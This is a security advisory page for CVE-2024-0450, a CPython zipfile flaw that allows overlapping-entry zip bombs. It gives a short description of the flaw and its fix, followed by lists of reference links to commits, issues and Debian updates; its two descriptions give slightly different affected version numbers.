CVE-2024-0450

Advisory

An issue was found in the CPython `zipfile` module affecting versions 3.12.1, 3.11.7, 3.10.13, 3.9.18, and 3.8.18 and prior. The zipfile module is vulnerable to “quoted-overlap” zip-bombs which exploit the zip format to create a zip-bomb with a high compression ratio. The fixed versions of CPython makes the zipfile module reject zip archives which overlap entries in the archive.

Affected package

Affected versions

Fixed versions

Vulnerability changelog

An issue was found in the CPython `zipfile` module affecting versions 3.12.2, 3.11.8, 3.10.13, 3.9.18, and 3.8.18 and prior. The zipfile module is vulnerable to “quoted-overlap” zip-bombs which exploit the zip format to create a zip-bomb with a high compression ratio. The fixed versions of CPython makes the zipfile module reject zip archives which overlap entries in the archive. See CVE-2024-0450.


MISC:https://github.com/python/cpython/commit/30fe5d853b56138dbec62432d370a1f99409fc85: https://github.com/python/cpython/commit/30fe5d853b56138dbec62432d370a1f99409fc85
MISC:https://github.com/python/cpython/commit/66363b9a7b9fe7c99eba3a185b74c5fdbf842eba: https://github.com/python/cpython/commit/66363b9a7b9fe7c99eba3a185b74c5fdbf842eba
MISC:https://github.com/python/cpython/commit/a2c59992e9e8d35baba9695eb186ad6c6ff85c51: https://github.com/python/cpython/commit/a2c59992e9e8d35baba9695eb186ad6c6ff85c51
MISC:https://github.com/python/cpython/commit/a956e510f6336d5ae111ba429a61c3ade30a7549: https://github.com/python/cpython/commit/a956e510f6336d5ae111ba429a61c3ade30a7549
MISC:https://github.com/python/cpython/commit/d05bac0b74153beb541b88b4fca33bf053990183: https://github.com/python/cpython/commit/d05bac0b74153beb541b88b4fca33bf053990183
MISC:https://github.com/python/cpython/commit/fa181fcf2156f703347b03a3b1966ce47be8ab3b: https://github.com/python/cpython/commit/fa181fcf2156f703347b03a3b1966ce47be8ab3b
MISC:https://github.com/python/cpython/issues/109858: https://github.com/python/cpython/issues/109858
MISC:https://mail.python.org/archives/list/[email protected]/thread/XELNUX2L3IOHBTFU7RQHCY6OUVEWZ2FG/: https://mail.python.org/archives/list/[email protected]/thread/XELNUX2L3IOHBTFU7RQHCY6OUVEWZ2FG/
MISC:https://www.bamsoftware.com/hacks/zipbomb/: https://www.bamsoftware.com/hacks/zipbomb/
MLIST:[debian-lts-announce] 20240324 [SECURITY] [DLA 3771-1] python2.7 security update: https://lists.debian.org/debian-lts-announce/2024/03/msg00024.html
MLIST:[debian-lts-announce] 20240324 [SECURITY] [DLA 3772-1] python3.7 security update: https://lists.debian.org/debian-lts-announce/2024/03/msg00025.html

Resources

• https://github.com/python/cpython/commit/30fe5d853b56138dbec62432d370a1f99409fc85
• https://github.com/python/cpython/commit/66363b9a7b9fe7c99eba3a185b74c5fdbf842eba
• https://github.com/python/cpython/commit/a2c59992e9e8d35baba9695eb186ad6c6ff85c51
• https://github.com/python/cpython/commit/a956e510f6336d5ae111ba429a61c3ade30a7549
• https://github.com/python/cpython/commit/d05bac0b74153beb541b88b4fca33bf053990183
• https://github.com/python/cpython/commit/fa181fcf2156f703347b03a3b1966ce47be8ab3b
• https://github.com/python/cpython/issues/109858
• https://mail.python.org/archives/list/[email protected]/thread/XELNUX2L3IOHBTFU7RQHCY6OUVEWZ2FG/
• https://www.bamsoftware.com/hacks/zipbomb/
• https://lists.debian.org/debian-lts-announce/2024/03/msg00024.html
• https://lists.debian.org/debian-lts-announce/2024/03/msg00025.html
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0450